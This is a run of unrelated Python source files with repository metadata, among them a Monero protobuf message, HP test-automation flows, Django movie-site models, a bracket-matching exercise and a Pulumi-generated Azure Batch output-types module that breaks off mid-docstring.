] | permissive | ph4r05/monero-agent | 24ed1aa17d6616b2ae6bcdb7b9997f982f8b7b5d | 0bac0e6f33142b2bb885565bfd1ef8ac04559280 | refs/heads/master | 2022-10-18T06:30:43.550133 | 2021-07-01T16:27:56 | 2021-07-01T16:27:56 | 126,215,119 | 24 | 5 | MIT | 2022-09-23T22:53:44 | 2018-03-21T17:18:21 | Python | UTF-8 | Python | false | false | 1,433 | py | # Automatically generated by pb2py
# fmt: off
from .. import protobuf as p
if __debug__:
try:
from typing import Dict, List # noqa: F401
from typing_extensions import Literal # noqa: F401
except ImportError:
pass
class MoneroGetTxKeyRequest(p.MessageType):
    """Protobuf message (wire type 550) requesting transaction-key material.

    NOTE(review): this class is generated by pb2py (see file header);
    regenerate from the .proto definition instead of editing by hand.
    The field numbers in get_fields() define the wire format.
    """
    MESSAGE_WIRE_TYPE = 550
    def __init__(
        self,
        address_n: List[int] = None,
        network_type: int = None,
        salt1: bytes = None,
        salt2: bytes = None,
        tx_enc_keys: bytes = None,
        tx_prefix_hash: bytes = None,
        reason: int = None,
        view_public_key: bytes = None,
    ) -> None:
        # address_n is the only repeated field; default to an empty path.
        self.address_n = address_n if address_n is not None else []
        self.network_type = network_type
        self.salt1 = salt1
        self.salt2 = salt2
        self.tx_enc_keys = tx_enc_keys
        self.tx_prefix_hash = tx_prefix_hash
        self.reason = reason
        self.view_public_key = view_public_key
    @classmethod
    def get_fields(cls) -> Dict:
        # field number -> (name, protobuf type, flags/default)
        return {
            1: ('address_n', p.UVarintType, p.FLAG_REPEATED),
            2: ('network_type', p.UVarintType, 0),
            3: ('salt1', p.BytesType, 0),
            4: ('salt2', p.BytesType, 0),
            5: ('tx_enc_keys', p.BytesType, 0),
            6: ('tx_prefix_hash', p.BytesType, 0),
            7: ('reason', p.UVarintType, 0),
            8: ('view_public_key', p.BytesType, 0),
        }
| [
"dusan.klinec@gmail.com"
] | dusan.klinec@gmail.com |
0db085b02f0f82902740aec7e44bb19ae0918fef | 7b4e9342d42be2b55af5dc23a8abedd672d68e99 | /libs/flows/windows/jweb/flow_container.py | d286652e4bd3a203a05068468b2b900f0cf0c236 | [] | no_license | Amal548/QAMA | af5bb335c92a90b461f1ee9a3870435d83d46802 | b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5 | refs/heads/master | 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | import logging
from time import sleep
from MobileApps.libs.ma_misc import ma_misc
from MobileApps.libs.flows.windows.jweb.home import Home
from MobileApps.libs.flows.web.hp_id.hp_id import HPID
from MobileApps.libs.flows.windows.jweb.auth_plugin import AuthPlugin
from MobileApps.libs.flows.windows.jweb.eventing_plugin import EventingPlugin
from MobileApps.resources.const.windows.const import *
class FlowContainer(object):
    """Bundles the JWeb flow objects and exposes high-level app actions."""

    def __init__(self, driver):
        self.driver = driver
        self.fd = {
            "home": Home(driver),
            "hpid": HPID(driver, context="NATIVE_APP"),
            "auth_plugin": AuthPlugin(driver),
            "eventing_plugin": EventingPlugin(driver),
        }

    @property
    def flow(self):
        """Read-only access to the flow dictionary."""
        return self.fd

    # ------------------------------------------------------------------
    # Action flows
    # ------------------------------------------------------------------
    def flow_load_home_screen(self):
        """Bring the app to the Home screen.

        Launches the app when the Home menu button is not visible, then
        maximizes the window if it is in the normal (restored) state.
        """
        home = self.fd["home"]
        if not home.verify_menu_button():
            self.driver.launch_app(APP_NAME.JWEB)
        if home.verify_window_visual_state_normal():
            home.click_maximize_window()

    def close_jweb_app(self):
        """Close the Jarvis reference app if its close button is present."""
        logging.debug("Closing Jarvis App...")
        home = self.fd["home"]
        if home.verify_close_window():
            home.click_close_window()
"amal.muthiah@hp.com"
] | amal.muthiah@hp.com |
d1e693b8016e93dcc0157e1fd514a70256b61cc2 | 2734b77a68f6d7e22e8b823418ad1c59fe1a34af | /opengever/usermigration/exceptions.py | eb73aaf30ee632b9957c748ba72141de5c4b1d33 | [] | no_license | 4teamwork/opengever.core | 5963660f5f131bc12fd0a5898f1d7c8f24a5e2b1 | a01bec6c00d203c21a1b0449f8d489d0033c02b7 | refs/heads/master | 2023-08-30T23:11:27.914905 | 2023-08-25T14:27:15 | 2023-08-25T14:27:15 | 9,788,097 | 19 | 8 | null | 2023-09-14T13:28:56 | 2013-05-01T08:28:16 | Python | UTF-8 | Python | false | false | 96 | py | class UserMigrationException(Exception):
"""An error occured during user migration.
"""
| [
"lukas.graf@4teamwork.ch"
] | lukas.graf@4teamwork.ch |
f17b80dc4d7e285090138061fd5c7212a6c11d43 | 89044f6606e3ccfbbca0b0dacc277497e735d5d4 | /lecture02/exercise02-B/template.py | de5bc2e02d30081a54e08b493b21c899c65425fb | [
"MIT"
] | permissive | nd-cse-34872-su21/cse-34872-su21-examples | 10595f1d53ad3a45fd5e293a8705aefd66bf65c9 | 0294bb0964b502bbb8541054977988c4a3b49dab | refs/heads/master | 2023-05-14T09:55:26.573462 | 2021-06-08T14:23:59 | 2021-06-08T14:23:59 | 370,460,163 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | #!/usr/bin/env python3
import sys
# Functions
# Bracket pairs are index-aligned: LEFT_PBB[i] is closed by RIGHT_PBB[i].
LEFT_PBB = ('(', '[', '{')
RIGHT_PBB = (')', ']', '}')

def is_pbbmatched(s):
    """Return True if the brackets in s are balanced and properly nested.

    Implements the TODO: push the *expected* closing symbol for every
    opener; a closer must match the top of the stack.  Non-bracket
    characters are ignored.  The string is balanced only if the stack is
    empty at the end.
    """
    stack = []
    for ch in s:
        if ch in LEFT_PBB:
            stack.append(RIGHT_PBB[LEFT_PBB.index(ch)])
        elif ch in RIGHT_PBB:
            if not stack or stack.pop() != ch:
                return False
    return not stack
# Main execution
def main():
    """Read lines from stdin and print whether each one is balanced."""
    for line in sys.stdin:
        word = line.rstrip()
        verdict = 'Yes' if is_pbbmatched(word) else 'No'
        print('{:>10}: {}'.format(word, verdict))
if __name__ == '__main__':
main()
| [
"pbui@nd.edu"
] | pbui@nd.edu |
5ee64de7a0e5c54c20e9a919092352983197fa28 | edbcb34df3f31bda1e90d9926916da8efc24f65d | /app/models.py | 5130107da2b6efca832994dd037e4bf8af4bad4c | [] | no_license | yuansuixin/movies_project | 74281ceeb6cc6e890c7a7e8d3f9a84e13e2ffdc7 | 8cd5dac957e9475c5f61c4dd648718a8cb782981 | refs/heads/master | 2021-04-05T23:30:57.037168 | 2018-03-14T15:36:55 | 2018-03-14T15:36:55 | 125,233,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | from django.db import models
# Create your models here.
# Site user account.
class User(models.Model):
    # Password (stored as a 32-char string).
    u_password = models.CharField(max_length=32)
    # Nickname; also serves as the primary key.
    u_name = models.CharField(max_length=20,primary_key=True)
    # Avatar image, uploaded under media/icons.
    u_icon = models.ImageField(upload_to='icons')
    # Soft-delete flag.
    isDelete = models.BooleanField(default=False)
    # Optional e-mail address.  NOTE(review): max_length=16 looks too
    # short for real addresses — confirm against the registration form.
    email = models.CharField(null=True,max_length=16)
class Banner(models.Model):
    """A promotional banner with a name, an image and a description."""
    name = models.CharField(max_length=20)
    image = models.ImageField(upload_to='image')
    desc = models.CharField(max_length=200)
class Movies(models.Model):
    """A movie entry with poster, like counter and playback request URL."""
    title = models.CharField(max_length=100)
    desc = models.CharField(max_length=200)
    # External/poster identifier.  NOTE(review): meaning inferred from the
    # name only — confirm against the data source.
    postid = models.IntegerField()
    image = models.ImageField(upload_to='image')
    # Total number of likes.
    like_num = models.IntegerField(default=0)
    # URL used to fetch/play the movie; may be absent.
    request_url = models.CharField(max_length=200,null=True)
    # Whether the *current* viewer liked it (denormalized flag).
    is_like = models.BooleanField(default=False)
    # Stored as text; defaults to the string for 0.
    duration = models.CharField(default=0,max_length=16)
class Like(models.Model):
    """Join table recording which user liked which movie."""
    like_user = models.ForeignKey(User)
    like_movies = models.ForeignKey(Movies)
| [
"cyss428@163.com"
] | cyss428@163.com |
242533baba2a20c2d3b4e0423fb84119da1b8406 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/batch/outputs.py | ed75b44fb3c310c7cc66bfb9b6b27e814a0722b9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 154,050 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = [
'ApplicationPackageReferenceResponse',
'AutoScaleRunErrorResponse',
'AutoScaleRunResponse',
'AutoScaleSettingsResponse',
'AutoStoragePropertiesResponse',
'AutoUserSpecificationResponse',
'AzureBlobFileSystemConfigurationResponse',
'AzureFileShareConfigurationResponse',
'BatchAccountIdentityResponse',
'BatchAccountIdentityResponseUserAssignedIdentities',
'BatchPoolIdentityResponse',
'BatchPoolIdentityResponseUserAssignedIdentities',
'CIFSMountConfigurationResponse',
'CertificateReferenceResponse',
'CloudServiceConfigurationResponse',
'ContainerConfigurationResponse',
'ContainerRegistryResponse',
'DataDiskResponse',
'DeleteCertificateErrorResponse',
'DeploymentConfigurationResponse',
'DiskEncryptionConfigurationResponse',
'EncryptionPropertiesResponse',
'EnvironmentSettingResponse',
'FixedScaleSettingsResponse',
'ImageReferenceResponse',
'InboundNatPoolResponse',
'KeyVaultPropertiesResponse',
'KeyVaultReferenceResponse',
'LinuxUserConfigurationResponse',
'MetadataItemResponse',
'MountConfigurationResponse',
'NFSMountConfigurationResponse',
'NetworkConfigurationResponse',
'NetworkSecurityGroupRuleResponse',
'NodePlacementConfigurationResponse',
'PoolEndpointConfigurationResponse',
'PrivateEndpointConnectionResponse',
'PrivateEndpointResponse',
'PrivateLinkServiceConnectionStateResponse',
'PublicIPAddressConfigurationResponse',
'ResizeErrorResponse',
'ResizeOperationStatusResponse',
'ResourceFileResponse',
'ScaleSettingsResponse',
'StartTaskResponse',
'TaskContainerSettingsResponse',
'TaskSchedulingPolicyResponse',
'UserAccountResponse',
'UserIdentityResponse',
'VMExtensionResponse',
'VirtualMachineConfigurationResponse',
'VirtualMachineFamilyCoreQuotaResponse',
'WindowsConfigurationResponse',
'WindowsUserConfigurationResponse',
]
@pulumi.output_type
class ApplicationPackageReferenceResponse(dict):
    """Output wrapper for an application-package reference: an id plus an
    optional version.  Generated code — do not edit by hand (see file header).
    """
    def __init__(__self__, *,
                 id: str,
                 version: Optional[str] = None):
        """
        :param str version: If this is omitted, and no default version is specified for this application, the request fails with the error code InvalidApplicationPackageReferences. If you are calling the REST API directly, the HTTP status code is 409.
        """
        pulumi.set(__self__, "id", id)
        if version is not None:
            pulumi.set(__self__, "version", version)
    @property
    @pulumi.getter
    def id(self) -> str:
        return pulumi.get(self, "id")
    @property
    @pulumi.getter
    def version(self) -> Optional[str]:
        """
        If this is omitted, and no default version is specified for this application, the request fails with the error code InvalidApplicationPackageReferences. If you are calling the REST API directly, the HTTP status code is 409.
        """
        return pulumi.get(self, "version")
@pulumi.output_type
class AutoScaleRunErrorResponse(dict):
    """Output wrapper for an autoscale-run error: a machine-readable code, a
    display message, and optional nested detail errors.  Generated code.
    """
    def __init__(__self__, *,
                 code: str,
                 message: str,
                 details: Optional[Sequence['outputs.AutoScaleRunErrorResponse']] = None):
        """
        :param str code: An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
        :param str message: A message describing the error, intended to be suitable for display in a user interface.
        """
        pulumi.set(__self__, "code", code)
        pulumi.set(__self__, "message", message)
        if details is not None:
            pulumi.set(__self__, "details", details)
    @property
    @pulumi.getter
    def code(self) -> str:
        """
        An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
        """
        return pulumi.get(self, "code")
    @property
    @pulumi.getter
    def message(self) -> str:
        """
        A message describing the error, intended to be suitable for display in a user interface.
        """
        return pulumi.get(self, "message")
    @property
    @pulumi.getter
    def details(self) -> Optional[Sequence['outputs.AutoScaleRunErrorResponse']]:
        return pulumi.get(self, "details")
@pulumi.output_type
class AutoScaleRunResponse(dict):
    """Output wrapper for an autoscale evaluation: the evaluation time plus an
    optional error and an optional results string.  Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "evaluationTime":
            suggest = "evaluation_time"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in AutoScaleRunResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        AutoScaleRunResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        AutoScaleRunResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 evaluation_time: str,
                 error: Optional['outputs.AutoScaleRunErrorResponse'] = None,
                 results: Optional[str] = None):
        """
        :param str results: Each variable value is returned in the form $variable=value, and variables are separated by semicolons.
        """
        pulumi.set(__self__, "evaluation_time", evaluation_time)
        if error is not None:
            pulumi.set(__self__, "error", error)
        if results is not None:
            pulumi.set(__self__, "results", results)
    @property
    @pulumi.getter(name="evaluationTime")
    def evaluation_time(self) -> str:
        return pulumi.get(self, "evaluation_time")
    @property
    @pulumi.getter
    def error(self) -> Optional['outputs.AutoScaleRunErrorResponse']:
        return pulumi.get(self, "error")
    @property
    @pulumi.getter
    def results(self) -> Optional[str]:
        """
        Each variable value is returned in the form $variable=value, and variables are separated by semicolons.
        """
        return pulumi.get(self, "results")
@pulumi.output_type
class AutoScaleSettingsResponse(dict):
    """Output wrapper for autoscale settings: the formula plus an optional
    evaluation interval.  Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "evaluationInterval":
            suggest = "evaluation_interval"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in AutoScaleSettingsResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        AutoScaleSettingsResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        AutoScaleSettingsResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 formula: str,
                 evaluation_interval: Optional[str] = None):
        """
        :param str evaluation_interval: If omitted, the default value is 15 minutes (PT15M).
        """
        pulumi.set(__self__, "formula", formula)
        if evaluation_interval is not None:
            pulumi.set(__self__, "evaluation_interval", evaluation_interval)
    @property
    @pulumi.getter
    def formula(self) -> str:
        return pulumi.get(self, "formula")
    @property
    @pulumi.getter(name="evaluationInterval")
    def evaluation_interval(self) -> Optional[str]:
        """
        If omitted, the default value is 15 minutes (PT15M).
        """
        return pulumi.get(self, "evaluation_interval")
@pulumi.output_type
class AutoStoragePropertiesResponse(dict):
    """
    Contains information about the auto-storage account associated with a Batch account.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "lastKeySync":
            suggest = "last_key_sync"
        elif key == "storageAccountId":
            suggest = "storage_account_id"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in AutoStoragePropertiesResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        AutoStoragePropertiesResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        AutoStoragePropertiesResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 last_key_sync: str,
                 storage_account_id: str):
        """
        Contains information about the auto-storage account associated with a Batch account.
        :param str last_key_sync: The UTC time at which storage keys were last synchronized with the Batch account.
        :param str storage_account_id: The resource ID of the storage account to be used for auto-storage account.
        """
        pulumi.set(__self__, "last_key_sync", last_key_sync)
        pulumi.set(__self__, "storage_account_id", storage_account_id)
    @property
    @pulumi.getter(name="lastKeySync")
    def last_key_sync(self) -> str:
        """
        The UTC time at which storage keys were last synchronized with the Batch account.
        """
        return pulumi.get(self, "last_key_sync")
    @property
    @pulumi.getter(name="storageAccountId")
    def storage_account_id(self) -> str:
        """
        The resource ID of the storage account to be used for auto-storage account.
        """
        return pulumi.get(self, "storage_account_id")
@pulumi.output_type
class AutoUserSpecificationResponse(dict):
    """Output wrapper for an auto-user specification: optional elevation level
    and scope.  Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "elevationLevel":
            suggest = "elevation_level"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in AutoUserSpecificationResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        AutoUserSpecificationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        AutoUserSpecificationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 elevation_level: Optional[str] = None,
                 scope: Optional[str] = None):
        """
        :param str elevation_level: The default value is nonAdmin.
        :param str scope: The default value is Pool. If the pool is running Windows a value of Task should be specified if stricter isolation between tasks is required. For example, if the task mutates the registry in a way which could impact other tasks, or if certificates have been specified on the pool which should not be accessible by normal tasks but should be accessible by start tasks.
        """
        if elevation_level is not None:
            pulumi.set(__self__, "elevation_level", elevation_level)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
    @property
    @pulumi.getter(name="elevationLevel")
    def elevation_level(self) -> Optional[str]:
        """
        The default value is nonAdmin.
        """
        return pulumi.get(self, "elevation_level")
    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        """
        The default value is Pool. If the pool is running Windows a value of Task should be specified if stricter isolation between tasks is required. For example, if the task mutates the registry in a way which could impact other tasks, or if certificates have been specified on the pool which should not be accessible by normal tasks but should be accessible by start tasks.
        """
        return pulumi.get(self, "scope")
@pulumi.output_type
class AzureBlobFileSystemConfigurationResponse(dict):
    """Output wrapper for an Azure Blob (blobfuse) mount: account/container,
    relative mount path, and exactly one of accountKey or sasKey.
    Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "accountName":
            suggest = "account_name"
        elif key == "containerName":
            suggest = "container_name"
        elif key == "relativeMountPath":
            suggest = "relative_mount_path"
        elif key == "accountKey":
            suggest = "account_key"
        elif key == "blobfuseOptions":
            suggest = "blobfuse_options"
        elif key == "sasKey":
            suggest = "sas_key"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in AzureBlobFileSystemConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        AzureBlobFileSystemConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        AzureBlobFileSystemConfigurationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 account_name: str,
                 container_name: str,
                 relative_mount_path: str,
                 account_key: Optional[str] = None,
                 blobfuse_options: Optional[str] = None,
                 sas_key: Optional[str] = None):
        """
        :param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        :param str account_key: This property is mutually exclusive with sasKey and one must be specified.
        :param str blobfuse_options: These are 'net use' options in Windows and 'mount' options in Linux.
        :param str sas_key: This property is mutually exclusive with accountKey and one must be specified.
        """
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "container_name", container_name)
        pulumi.set(__self__, "relative_mount_path", relative_mount_path)
        if account_key is not None:
            pulumi.set(__self__, "account_key", account_key)
        if blobfuse_options is not None:
            pulumi.set(__self__, "blobfuse_options", blobfuse_options)
        if sas_key is not None:
            pulumi.set(__self__, "sas_key", sas_key)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> str:
        return pulumi.get(self, "account_name")
    @property
    @pulumi.getter(name="containerName")
    def container_name(self) -> str:
        return pulumi.get(self, "container_name")
    @property
    @pulumi.getter(name="relativeMountPath")
    def relative_mount_path(self) -> str:
        """
        All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        """
        return pulumi.get(self, "relative_mount_path")
    @property
    @pulumi.getter(name="accountKey")
    def account_key(self) -> Optional[str]:
        """
        This property is mutually exclusive with sasKey and one must be specified.
        """
        return pulumi.get(self, "account_key")
    @property
    @pulumi.getter(name="blobfuseOptions")
    def blobfuse_options(self) -> Optional[str]:
        """
        These are 'net use' options in Windows and 'mount' options in Linux.
        """
        return pulumi.get(self, "blobfuse_options")
    @property
    @pulumi.getter(name="sasKey")
    def sas_key(self) -> Optional[str]:
        """
        This property is mutually exclusive with accountKey and one must be specified.
        """
        return pulumi.get(self, "sas_key")
@pulumi.output_type
class AzureFileShareConfigurationResponse(dict):
    """Output wrapper for an Azure Files share mount: account credentials,
    the share URL, a relative mount path and optional mount options.
    Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "accountKey":
            suggest = "account_key"
        elif key == "accountName":
            suggest = "account_name"
        elif key == "azureFileUrl":
            suggest = "azure_file_url"
        elif key == "relativeMountPath":
            suggest = "relative_mount_path"
        elif key == "mountOptions":
            suggest = "mount_options"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in AzureFileShareConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        AzureFileShareConfigurationResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        AzureFileShareConfigurationResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 account_key: str,
                 account_name: str,
                 azure_file_url: str,
                 relative_mount_path: str,
                 mount_options: Optional[str] = None):
        """
        :param str azure_file_url: This is of the form 'https://{account}.file.core.windows.net/'.
        :param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        :param str mount_options: These are 'net use' options in Windows and 'mount' options in Linux.
        """
        pulumi.set(__self__, "account_key", account_key)
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "azure_file_url", azure_file_url)
        pulumi.set(__self__, "relative_mount_path", relative_mount_path)
        if mount_options is not None:
            pulumi.set(__self__, "mount_options", mount_options)
    @property
    @pulumi.getter(name="accountKey")
    def account_key(self) -> str:
        return pulumi.get(self, "account_key")
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> str:
        return pulumi.get(self, "account_name")
    @property
    @pulumi.getter(name="azureFileUrl")
    def azure_file_url(self) -> str:
        """
        This is of the form 'https://{account}.file.core.windows.net/'.
        """
        return pulumi.get(self, "azure_file_url")
    @property
    @pulumi.getter(name="relativeMountPath")
    def relative_mount_path(self) -> str:
        """
        All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
        """
        return pulumi.get(self, "relative_mount_path")
    @property
    @pulumi.getter(name="mountOptions")
    def mount_options(self) -> Optional[str]:
        """
        These are 'net use' options in Windows and 'mount' options in Linux.
        """
        return pulumi.get(self, "mount_options")
@pulumi.output_type
class BatchAccountIdentityResponse(dict):
    """
    The identity of the Batch account, if configured. This is only used when the user specifies 'Microsoft.KeyVault' as their Batch account encryption configuration.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "principalId":
            suggest = "principal_id"
        elif key == "tenantId":
            suggest = "tenant_id"
        elif key == "userAssignedIdentities":
            suggest = "user_assigned_identities"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in BatchAccountIdentityResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        BatchAccountIdentityResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        BatchAccountIdentityResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 principal_id: str,
                 tenant_id: str,
                 type: str,
                 user_assigned_identities: Optional[Mapping[str, 'outputs.BatchAccountIdentityResponseUserAssignedIdentities']] = None):
        """
        The identity of the Batch account, if configured. This is only used when the user specifies 'Microsoft.KeyVault' as their Batch account encryption configuration.
        :param str principal_id: The principal id of the Batch account. This property will only be provided for a system assigned identity.
        :param str tenant_id: The tenant id associated with the Batch account. This property will only be provided for a system assigned identity.
        :param str type: The type of identity used for the Batch account.
        :param Mapping[str, 'BatchAccountIdentityResponseUserAssignedIdentities'] user_assigned_identities: The list of user identities associated with the Batch account. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
        """
        pulumi.set(__self__, "principal_id", principal_id)
        pulumi.set(__self__, "tenant_id", tenant_id)
        pulumi.set(__self__, "type", type)
        if user_assigned_identities is not None:
            pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> str:
        """
        The principal id of the Batch account. This property will only be provided for a system assigned identity.
        """
        return pulumi.get(self, "principal_id")
    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> str:
        """
        The tenant id associated with the Batch account. This property will only be provided for a system assigned identity.
        """
        return pulumi.get(self, "tenant_id")
    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of identity used for the Batch account.
        """
        return pulumi.get(self, "type")
    @property
    @pulumi.getter(name="userAssignedIdentities")
    def user_assigned_identities(self) -> Optional[Mapping[str, 'outputs.BatchAccountIdentityResponseUserAssignedIdentities']]:
        """
        The list of user identities associated with the Batch account. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
        """
        return pulumi.get(self, "user_assigned_identities")
@pulumi.output_type
class BatchAccountIdentityResponseUserAssignedIdentities(dict):
    """Output wrapper for a user-assigned identity's client id and principal
    id, keyed off a Batch account.  Generated code.
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "clientId":
            suggest = "client_id"
        elif key == "principalId":
            suggest = "principal_id"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in BatchAccountIdentityResponseUserAssignedIdentities. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        BatchAccountIdentityResponseUserAssignedIdentities.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        BatchAccountIdentityResponseUserAssignedIdentities.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 client_id: str,
                 principal_id: str):
        """
        :param str client_id: The client id of user assigned identity.
        :param str principal_id: The principal id of user assigned identity.
        """
        pulumi.set(__self__, "client_id", client_id)
        pulumi.set(__self__, "principal_id", principal_id)
    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> str:
        """
        The client id of user assigned identity.
        """
        return pulumi.get(self, "client_id")
    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> str:
        """
        The principal id of user assigned identity.
        """
        return pulumi.get(self, "principal_id")
@pulumi.output_type
class BatchPoolIdentityResponse(dict):
    """
    The identity of the Batch pool, if configured. If the pool identity is updated during update an existing pool, only the new vms which are created after the pool shrinks to 0 will have the updated identities
    """
    # Warns when a deprecated camelCase dict key is used and points the
    # caller at the snake_case property getter instead.
    @staticmethod
    def __key_warning(key: str):
        suggest = None
        if key == "userAssignedIdentities":
            suggest = "user_assigned_identities"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in BatchPoolIdentityResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        BatchPoolIdentityResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        BatchPoolIdentityResponse.__key_warning(key)
        return super().get(key, default)
    def __init__(__self__, *,
                 type: str,
                 user_assigned_identities: Optional[Mapping[str, 'outputs.BatchPoolIdentityResponseUserAssignedIdentities']] = None):
        """
        The identity of the Batch pool, if configured. If the pool identity is updated during update an existing pool, only the new vms which are created after the pool shrinks to 0 will have the updated identities
        :param str type: The type of identity used for the Batch Pool.
        :param Mapping[str, 'BatchPoolIdentityResponseUserAssignedIdentities'] user_assigned_identities: The list of user identities associated with the Batch pool. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
        """
        pulumi.set(__self__, "type", type)
        if user_assigned_identities is not None:
            pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
    @property
    @pulumi.getter
    def type(self) -> str:
        """
        The type of identity used for the Batch Pool.
        """
        return pulumi.get(self, "type")
    @property
    @pulumi.getter(name="userAssignedIdentities")
    def user_assigned_identities(self) -> Optional[Mapping[str, 'outputs.BatchPoolIdentityResponseUserAssignedIdentities']]:
        """
